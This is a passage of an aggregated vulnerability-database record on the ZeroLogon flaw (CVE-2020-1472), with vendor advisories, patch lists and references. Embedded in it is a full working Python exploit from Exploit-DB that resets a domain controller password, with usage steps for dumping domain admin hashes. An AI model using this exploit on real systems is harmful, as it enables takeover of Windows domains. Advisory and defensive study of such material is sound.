Enterprise Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Numa-Q Division (Formerly Sequent) Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Lenovo Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Marconi Inc. Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NEC Corporation Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nexenta Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenBSD Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenIndiana Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Oracle Corporation Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sony Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### The OpenBSD project Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Tizen Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TrueOS Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Unisys Corporation Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### m0n0wall Unknown\n\nNotified: 2020-09-17 Updated: 2020-09-17 **CVE-2020-1472**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 53 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>\n * <https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>\n * <https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>\n * <https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/13db7494-6d2c-4448-be8f-cb5ba03e95d6>\n * <https://www.secura.com/pathtoimg.php?id=2055>\n * <https://www.samba.org/samba/security/CVE-2020-1472.html>\n * <https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html#SERVERSCHANNEL>\n * <https://github.com/SecuraBV/CVE-2020-1472>\n * <https://github.com/dirkjanm/CVE-2020-1472>\n * <https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon>\n * <https://github.com/CERTCC/PoC-Exploits/tree/master/cve-2020-1472>\n * <https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>\n * <https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916>\n * <https://nakedsecurity.sophos.com/2020/09/17/zerologon-hacking-windows-servers-with-a-bunch-of-zeros/>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2020-1472 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2020-1472>) \n---|--- \n**Date Public:** | 2020-09-16 \n**Date First Published:** | 2020-09-16 \n**Date Last Updated: ** | 2020-10-01 17:02 UTC \n**Document Revision: ** | 16 \n", "modified": "2020-10-01T17:02:00", "published": "2020-09-16T00:00:00", "id": "VU:490028", "href": "https://www.kb.cert.org/vuls/id/490028", "type": "cert", "title": "Microsoft Windows Netlogon Remote Protocol (MS-NRPC) uses insecure AES-CFB8 initialization vector", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2020-11-06T11:17:54", "bulletinFamily": "software", "cvelist": ["CVE-2020-1472"], "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. To exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access. Successful exploit will cause privilege escalation. (Vulnerability ID: HWPSIRT-2020-18310)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-1472.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20201105-01-netlogon-en", "edition": 1, "modified": "2020-11-05T00:00:00", "published": "2020-11-05T00:00:00", "id": "HUAWEI-SA-20201105-01-NETLOGON", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201105-01-netlogon-en", "title": "Security Advisory - Netlogon Elevation of Privilege Vulnerability", "type": "huawei", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "samba": [{"lastseen": "2020-12-24T13:20:52", "bulletinFamily": "software", "cvelist": ["CVE-2020-1472"], "description": "The following applies to Samba used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC).\nInstallations running Samba as a file server only are not directly affected by this flaw, though they may need configuration changes to continue to talk to domain controllers (see \"file servers and domain members\" below).\nThe netlogon protocol contains a flaw that allows an authentication bypass. This was reported and patched by Microsoft as CVE-2020-1472. Since the bug is a protocol level flaw, and Samba implements the protocol, Samba is also vulnerable.\nHowever, since version 4.8 (released in March 2018), the default behaviour of Samba has been to insist on a secure netlogon channel, which is a sufficient fix against the known exploits. This default is equivalent to having 'server schannel = yes' in the smb.conf.\nTherefore versions 4.8 and above are not vulnerable unless they have the smb.conf lines 'server schannel = no' or 'server schannel = auto'.\nSamba versions 4.7 and below are vulnerable unless they have 'server schannel = yes' in the smb.conf.\nNote each domain controller needs the correct settings in its smb.conf.\nVendors supporting Samba 4.7 and below are advised to patch their installations and packages to add this line to the [global] section if their smb.conf file.\nThe 'server schannel = yes' smb.conf line is equivalent to Microsoft's 'FullSecureChannelProtection=1' registry key, the introduction of which we understand forms the core of Microsoft's fix.\nConsequences", "edition": 2, "modified": "2020-09-18T00:00:00", "published": "2020-09-18T00:00:00", "id": "SAMBA:CVE-2020-1472", "href": "https://www.samba.org/samba/security/CVE-2020-1472.html", "title": "Unauthenticated domain takeover via netlogon (\"ZeroLogon\") ", "type": "samba", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2020-11-18T18:20:44", "description": "", "published": "2020-11-18T00:00:00", "type": "exploitdb", "title": "ZeroLogon - Netlogon Elevation of Privilege", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "EDB-ID:49071", "href": "https://www.exploit-db.com/exploits/49071", "sourceData": "# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\r\n# Date: 2020-10-04\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\r\n# Tested on: Microsoft Windows Server 2016 Standard x64\r\n# CVE : CVE-2020-1472\r\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\r\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\r\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\r\n#!/usr/bin/env python3\r\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\r\nfrom binascii import hexlify, unhexlify\r\nfrom subprocess import check_call\r\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\r\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\r\nfrom impacket import crypto, version\r\nfrom impacket.examples import logger\r\nfrom Cryptodome.Cipher import AES\r\nfrom struct import pack, unpack\r\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\r\n\r\n\r\nclass Exploit:\r\n def __init__(\r\n self,\r\n name='',\r\n address='',\r\n attempts=2000,\r\n password=''\r\n ):\r\n name = name.rstrip('$')\r\n self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\\r\n .ServerSecureChannel\r\n self.authenticator = self.getAuthenticator(stamp=0)\r\n self.clearNewPasswordBlob = b'\\x00' * 516\r\n self.primaryName = ('\\\\\\\\%s' % name) + '\\x00'\r\n self.accountName = ('%s$' % name) + '\\x00'\r\n self.computerName = name + '\\x00'\r\n self.clientCredential = b'\\x00' * 8\r\n self.clientChallenge = b'\\x00' * 8\r\n self.negotiateFlags = 0x212fffff\r\n self.address = address\r\n self.max = attempts\r\n self.dce = None\r\n self.sessionKey = None\r\n self.clientStoredCredential = None\r\n self.password = password\r\n\r\n def encodePassword(self, password):\r\n if isinstance(password, str):\r\n password = password.encode('utf-8')\r\n return b'\\x00' * (512 - len(password))\\\r\n + password \\\r\n + pack('<L', len(password))\r\n\r\n def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = creds\r\n authenticator['Timestamp'] = stamp\r\n return authenticator\r\n\r\n def serverReqChallenge(self):\r\n try:\r\n binding = epm.hept_map(\r\n self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\r\n )\r\n self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n return nrpc.hNetrServerReqChallenge(\r\n self.dce,\r\n self.primaryName,\r\n self.computerName,\r\n self.clientChallenge\r\n )\r\n except BaseException as ex:\r\n self.logError(ex)\r\n\r\n def serverAuthenticate(self):\r\n try:\r\n auth = nrpc.hNetrServerAuthenticate3(\r\n self.dce,\r\n self.primaryName,\r\n self.accountName,\r\n self.secureChannelType,\r\n self.computerName,\r\n self.clientCredential,\r\n self.negotiateFlags\r\n )\r\n assert auth['ErrorCode'] == 0\r\n self.logInfo('successfully authenticated')\r\n return True\r\n except nrpc.DCERPCSessionError as ex:\r\n self.dce = None\r\n if ex.get_error_code() == 0xc0000022:\r\n return None\r\n else:\r\n self.logFail(ex.get_error_code())\r\n except BaseException as ex:\r\n self.dce = None\r\n self.logFail(ex)\r\n self.dce = None\r\n\r\n def serverPasswordSet(self):\r\n try:\r\n return nrpc.hNetrServerPasswordSet2(\r\n self.dce,\r\n self.primaryName,\r\n self.accountName,\r\n self.secureChannelType,\r\n self.computerName,\r\n self.authenticator,\r\n self.clearNewPasswordBlob\r\n )\r\n except BaseException as ex:\r\n self.logError(ex)\r\n\r\n def authenticate(self):\r\n self.logInfo(\r\n 'checking target, attempting to authenticate %d max\r\nattempts' % self.max\r\n )\r\n for attempt in range(0, self.max):\r\n self.logInfo('attempt %d' % attempt)\r\n self.serverReqChallenge()\r\n self.serverAuthenticate()\r\n if self.dce is not None:\r\n break\r\n if self.dce:\r\n return True\r\n else:\r\n self.logError('failed to authenticate')\r\n\r\n def exploit(self):\r\n self.logInfo('attempting password reset')\r\n reset = self.serverPasswordSet()\r\n if reset['ErrorCode'] == 0:\r\n self.logInfo('successfully reset password')\r\n else:\r\n self.logError('failed to reset password')\r\n return self\r\n\r\n def ComputeNetlogonCredentialAES(self, challenge):\r\n return nrpc.ComputeNetlogonCredentialAES(\r\n challenge,\r\n self.sessionKey\r\n )\r\n\r\n def logInfo(self, message):\r\n sys.stdout.write(\"[+] %s\\n\" % str(message))\r\n return self\r\n\r\n def logError(self, message):\r\n sys.stderr.write(\"[-] error %s\\n\" % str(message))\r\n\r\n def logFail(self, message):\r\n sys.stderr.write(\"[!] failure %s\\n\" % str(message))\r\n sys.exit(2)\r\n\r\n def restore(self):\r\n self.logInfo('attempting to restore password')\r\n self.clientChallenge = b'12345678'\r\n try:\r\n self.primaryName = NULL\r\n challenge = self.serverReqChallenge()\r\n self.sessionKey = nrpc.ComputeSessionKeyAES(\r\n '', self.clientChallenge, challenge['ServerChallenge']\r\n )\r\n self.clientCredential = self.ComputeNetlogonCredentialAES(\r\n self.clientChallenge\r\n )\r\n try:\r\n self.serverAuthenticate()\r\n except Exception as e:\r\n if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\r\n raise\r\n self.logInfo('restoring password')\r\n self.clientStoredCredential = pack('<Q', unpack('<Q',\r\nself.clientCredential)[0] + 10)\r\n self.authenticator = self.getAuthenticator(\r\n\r\ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\r\n )\r\n self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\r\n self.encodePassword(self.password)\r\n )\r\n reset = self.serverPasswordSet()\r\n if reset['ErrorCode'] == 0:\r\n self.logInfo('successfully restored password')\r\n else:\r\n self.logError('failed to restore password')\r\n except Exception as ex:\r\n self.logError(ex)\r\n return self\r\n\r\n\r\nif __name__ == '__main__':\r\n info = \"\"\"\r\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\r\n\r\n 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\r\n cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\r\n\r\n 2. Exploit the DC - this will break the DC until restored:\r\n cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>\r\n\r\n 3. Dump the DC - for the DA hashes, this will not contain the\r\nmachine hex-pass:\r\n secretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP>\r\n\r\n 4. Dump the DC again - use the DA hash to get the machines hex-pass:\r\n secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\r\n\r\n 5. Restore target - this fixes the DC:\r\n cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>\r\n-hex <HEXPASS>\r\n\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='CVE-2020-1472 ZeroLogon Exploit - Netlogon\r\nElevation of Privilege',\r\n add_help=True\r\n )\r\n try:\r\n parser.add_argument('-do', default='check', action='store',\r\n help='What to do (default check):\r\n[check|restore|exploit]')\r\n parser.add_argument('-target', action='store',\r\n help='NETBIOS name of target DC (not the FQDN)')\r\n parser.add_argument('-ip', action='store',\r\n help='IP address of target DC')\r\n parser.add_argument('-password', default='', action='store',\r\n help='The plaintext password to use to\r\nreset the DC')\r\n parser.add_argument('-hex', default='', action='store',\r\n help='The hex password to use to restore\r\nthe DC (recommended)')\r\n parser.add_argument('-max', default=2000, action='store',\r\n help='Max attempts to authenticate with\r\nthe DC (usually ~300 or less)')\r\n\r\n if len(sys.argv) < 3:\r\n parser.print_help()\r\n print(info)\r\n sys.exit(1)\r\n options = parser.parse_args()\r\n\r\n if options.do.lower() == 'check':\r\n Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n attempts=int(options.max)\r\n ).authenticate()\r\n elif options.do.lower() == 'exploit':\r\n exp = Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n attempts=int(options.max)\r\n )\r\n if exp.authenticate():\r\n exp.exploit()\r\n elif options.do.lower() == 'restore':\r\n if options.hex != '' and options.password == '':\r\n options.password = unhexlify(options.hex)\r\n if options.password != '':\r\n exp = Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n password=options.password\r\n ).restore()\r\n else:\r\n parser.print_help()\r\n\r\n except Exception as error:\r\n sys.stderr.write('[-] error in main %s\\n' % str(error))", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49071"}], "amazon": [{"lastseen": "2021-01-15T01:27:39", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14318", "CVE-2020-1472", "CVE-2020-14323"], "description": "**Issue Overview:**\n\nA flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker. ([CVE-2020-14318 __](<https://access.redhat.com/security/cve/CVE-2020-14318>))\n\nA null pointer dereference flaw was found in Samba's winbind service. This flaw allows a local user to crash the winbind service, causing a denial of service. The highest threat from this vulnerability is to system availability. ([CVE-2020-14323 __](<https://access.redhat.com/security/cve/CVE-2020-14323>))\n\nA flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC), where it reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and possibly obtain domain administrator \nprivileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. ([CVE-2020-1472 __](<https://access.redhat.com/security/cve/CVE-2020-1472>))\n\n \n**Affected Packages:** \n\n\nsamba\n\n \n**Issue Correction:** \nRun _yum update samba_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n samba-client-4.10.16-9.56.amzn1.i686 \n samba-libs-4.10.16-9.56.amzn1.i686 \n samba-common-libs-4.10.16-9.56.amzn1.i686 \n ctdb-4.10.16-9.56.amzn1.i686 \n libwbclient-4.10.16-9.56.amzn1.i686 \n samba-client-libs-4.10.16-9.56.amzn1.i686 \n samba-debuginfo-4.10.16-9.56.amzn1.i686 \n libsmbclient-devel-4.10.16-9.56.amzn1.i686 \n samba-winbind-modules-4.10.16-9.56.amzn1.i686 \n samba-python-test-4.10.16-9.56.amzn1.i686 \n samba-krb5-printing-4.10.16-9.56.amzn1.i686 \n samba-devel-4.10.16-9.56.amzn1.i686 \n libsmbclient-4.10.16-9.56.amzn1.i686 \n samba-python-4.10.16-9.56.amzn1.i686 \n samba-4.10.16-9.56.amzn1.i686 \n samba-winbind-4.10.16-9.56.amzn1.i686 \n samba-test-libs-4.10.16-9.56.amzn1.i686 \n samba-common-tools-4.10.16-9.56.amzn1.i686 \n libwbclient-devel-4.10.16-9.56.amzn1.i686 \n samba-winbind-clients-4.10.16-9.56.amzn1.i686 \n ctdb-tests-4.10.16-9.56.amzn1.i686 \n samba-winbind-krb5-locator-4.10.16-9.56.amzn1.i686 \n samba-test-4.10.16-9.56.amzn1.i686 \n \n noarch: \n samba-pidl-4.10.16-9.56.amzn1.noarch \n samba-common-4.10.16-9.56.amzn1.noarch \n \n src: \n samba-4.10.16-9.56.amzn1.src \n \n x86_64: \n samba-winbind-modules-4.10.16-9.56.amzn1.x86_64 \n libwbclient-devel-4.10.16-9.56.amzn1.x86_64 \n samba-4.10.16-9.56.amzn1.x86_64 \n samba-client-4.10.16-9.56.amzn1.x86_64 \n samba-common-tools-4.10.16-9.56.amzn1.x86_64 \n samba-client-libs-4.10.16-9.56.amzn1.x86_64 \n libwbclient-4.10.16-9.56.amzn1.x86_64 \n samba-test-4.10.16-9.56.amzn1.x86_64 \n samba-python-4.10.16-9.56.amzn1.x86_64 \n ctdb-4.10.16-9.56.amzn1.x86_64 \n samba-winbind-clients-4.10.16-9.56.amzn1.x86_64 \n samba-devel-4.10.16-9.56.amzn1.x86_64 \n libsmbclient-4.10.16-9.56.amzn1.x86_64 \n samba-krb5-printing-4.10.16-9.56.amzn1.x86_64 \n samba-libs-4.10.16-9.56.amzn1.x86_64 \n samba-winbind-4.10.16-9.56.amzn1.x86_64 \n samba-test-libs-4.10.16-9.56.amzn1.x86_64 \n samba-winbind-krb5-locator-4.10.16-9.56.amzn1.x86_64 \n libsmbclient-devel-4.10.16-9.56.amzn1.x86_64 \n samba-python-test-4.10.16-9.56.amzn1.x86_64 \n samba-debuginfo-4.10.16-9.56.amzn1.x86_64 \n samba-common-libs-4.10.16-9.56.amzn1.x86_64 \n ctdb-tests-4.10.16-9.56.amzn1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-12T22:51:00", "published": "2021-01-12T22:51:00", "id": "ALAS-2021-1469", "href": "https://alas.aws.amazon.com/ALAS-2021-1469.html", "title": "Critical: samba", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-08T01:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14318", "CVE-2020-1472", "CVE-2020-14323"], "description": "**Issue Overview:**\n\nA flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker. ([CVE-2020-14318 __](<https://access.redhat.com/security/cve/CVE-2020-14318>))\n\nA null pointer dereference flaw was found in Samba's winbind service. This flaw allows a local user to crash the winbind service, causing a denial of service. The highest threat from this vulnerability is to system availability. ([CVE-2020-14323 __](<https://access.redhat.com/security/cve/CVE-2020-14323>))\n\nA flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC), where it reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and possibly obtain domain administrator \nprivileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. ([CVE-2020-1472 __](<https://access.redhat.com/security/cve/CVE-2020-1472>))\n\n \n**Affected Packages:** \n\n\nsamba\n\n \n**Issue Correction:** \nRun _yum update samba_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n samba-4.10.16-9.amzn2.0.1.aarch64 \n samba-client-4.10.16-9.amzn2.0.1.aarch64 \n samba-client-libs-4.10.16-9.amzn2.0.1.aarch64 \n samba-common-libs-4.10.16-9.amzn2.0.1.aarch64 \n samba-common-tools-4.10.16-9.amzn2.0.1.aarch64 \n samba-dc-4.10.16-9.amzn2.0.1.aarch64 \n samba-dc-libs-4.10.16-9.amzn2.0.1.aarch64 \n samba-devel-4.10.16-9.amzn2.0.1.aarch64 \n samba-krb5-printing-4.10.16-9.amzn2.0.1.aarch64 \n samba-libs-4.10.16-9.amzn2.0.1.aarch64 \n libsmbclient-4.10.16-9.amzn2.0.1.aarch64 \n libsmbclient-devel-4.10.16-9.amzn2.0.1.aarch64 \n libwbclient-4.10.16-9.amzn2.0.1.aarch64 \n libwbclient-devel-4.10.16-9.amzn2.0.1.aarch64 \n samba-python-4.10.16-9.amzn2.0.1.aarch64 \n samba-python-test-4.10.16-9.amzn2.0.1.aarch64 \n samba-test-4.10.16-9.amzn2.0.1.aarch64 \n samba-test-libs-4.10.16-9.amzn2.0.1.aarch64 \n samba-winbind-4.10.16-9.amzn2.0.1.aarch64 \n samba-winbind-clients-4.10.16-9.amzn2.0.1.aarch64 \n samba-winbind-krb5-locator-4.10.16-9.amzn2.0.1.aarch64 \n samba-winbind-modules-4.10.16-9.amzn2.0.1.aarch64 \n ctdb-4.10.16-9.amzn2.0.1.aarch64 \n ctdb-tests-4.10.16-9.amzn2.0.1.aarch64 \n samba-debuginfo-4.10.16-9.amzn2.0.1.aarch64 \n \n i686: \n samba-4.10.16-9.amzn2.0.1.i686 \n samba-client-4.10.16-9.amzn2.0.1.i686 \n samba-client-libs-4.10.16-9.amzn2.0.1.i686 \n samba-common-libs-4.10.16-9.amzn2.0.1.i686 \n samba-common-tools-4.10.16-9.amzn2.0.1.i686 \n samba-dc-4.10.16-9.amzn2.0.1.i686 \n samba-dc-libs-4.10.16-9.amzn2.0.1.i686 \n samba-devel-4.10.16-9.amzn2.0.1.i686 \n samba-krb5-printing-4.10.16-9.amzn2.0.1.i686 \n samba-libs-4.10.16-9.amzn2.0.1.i686 \n libsmbclient-4.10.16-9.amzn2.0.1.i686 \n libsmbclient-devel-4.10.16-9.amzn2.0.1.i686 \n libwbclient-4.10.16-9.amzn2.0.1.i686 \n libwbclient-devel-4.10.16-9.amzn2.0.1.i686 \n samba-python-4.10.16-9.amzn2.0.1.i686 \n samba-python-test-4.10.16-9.amzn2.0.1.i686 \n samba-test-4.10.16-9.amzn2.0.1.i686 \n samba-test-libs-4.10.16-9.amzn2.0.1.i686 \n samba-winbind-4.10.16-9.amzn2.0.1.i686 \n samba-winbind-clients-4.10.16-9.amzn2.0.1.i686 \n samba-winbind-krb5-locator-4.10.16-9.amzn2.0.1.i686 \n samba-winbind-modules-4.10.16-9.amzn2.0.1.i686 \n ctdb-4.10.16-9.amzn2.0.1.i686 \n ctdb-tests-4.10.16-9.amzn2.0.1.i686 \n samba-debuginfo-4.10.16-9.amzn2.0.1.i686 \n \n noarch: \n samba-common-4.10.16-9.amzn2.0.1.noarch \n samba-pidl-4.10.16-9.amzn2.0.1.noarch \n \n src: \n samba-4.10.16-9.amzn2.0.1.src \n \n x86_64: \n samba-4.10.16-9.amzn2.0.1.x86_64 \n samba-client-4.10.16-9.amzn2.0.1.x86_64 \n samba-client-libs-4.10.16-9.amzn2.0.1.x86_64 \n samba-common-libs-4.10.16-9.amzn2.0.1.x86_64 \n samba-common-tools-4.10.16-9.amzn2.0.1.x86_64 \n samba-dc-4.10.16-9.amzn2.0.1.x86_64 \n samba-dc-libs-4.10.16-9.amzn2.0.1.x86_64 \n samba-devel-4.10.16-9.amzn2.0.1.x86_64 \n samba-vfs-glusterfs-4.10.16-9.amzn2.0.1.x86_64 \n samba-krb5-printing-4.10.16-9.amzn2.0.1.x86_64 \n samba-libs-4.10.16-9.amzn2.0.1.x86_64 \n libsmbclient-4.10.16-9.amzn2.0.1.x86_64 \n libsmbclient-devel-4.10.16-9.amzn2.0.1.x86_64 \n libwbclient-4.10.16-9.amzn2.0.1.x86_64 \n libwbclient-devel-4.10.16-9.amzn2.0.1.x86_64 \n samba-python-4.10.16-9.amzn2.0.1.x86_64 \n samba-python-test-4.10.16-9.amzn2.0.1.x86_64 \n samba-test-4.10.16-9.amzn2.0.1.x86_64 \n samba-test-libs-4.10.16-9.amzn2.0.1.x86_64 \n samba-winbind-4.10.16-9.amzn2.0.1.x86_64 \n samba-winbind-clients-4.10.16-9.amzn2.0.1.x86_64 \n samba-winbind-krb5-locator-4.10.16-9.amzn2.0.1.x86_64 \n samba-winbind-modules-4.10.16-9.amzn2.0.1.x86_64 \n ctdb-4.10.16-9.amzn2.0.1.x86_64 \n ctdb-tests-4.10.16-9.amzn2.0.1.x86_64 \n samba-debuginfo-4.10.16-9.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-05T23:34:00", "published": "2021-01-05T23:34:00", "id": "ALAS2-2021-1585", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1585.html", "title": "Critical: samba", "type": "amazon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-17T01:23:50", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14318", "CVE-2020-1472", "CVE-2020-14323"], "description": "[4.10.17-9]\n- related: #1853272 - Add back missing patch hunks\n[4.10.16-8]\n- resolves: #1878205 - Fix restarting winbind on package upgrade\n- resolves: #1892632 - Fix CVE-2020-14318\n- resolves: #1891687 - Fix CVE-2020-14323\n- resolves: #1879834 - Fix CVE-2020-1472\n- resolves: #1892313 - Fix memory leak in winbindd (wbinfo -u)\n- resolves: #1868917 - Fix %U substitution for 'valid users' option\n- resolves: #1853272 - Fix 'require_membership_of' documentation in\n pam_winbind{.conf} manpage", "edition": 2, "modified": "2020-12-16T00:00:00", "published": "2020-12-16T00:00:00", "id": "ELSA-2020-5439", "href": "http://linux.oracle.com/errata/ELSA-2020-5439.html", "title": "samba security and bug fix update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2020-12-15T11:30:01", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14318", "CVE-2020-14323", "CVE-2020-1472"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.\n\nSecurity Fix(es):\n\n* samba: Netlogon elevation of privilege vulnerability (Zerologon) (CVE-2020-1472)\n\n* samba: Missing handle permissions check in SMB1/2/3 ChangeNotify (CVE-2020-14318)\n\n* samba: Unprivileged user can crash winbind (CVE-2020-14323)\n\nFor more details about the security issue(s), including the impact, a CVSS score, 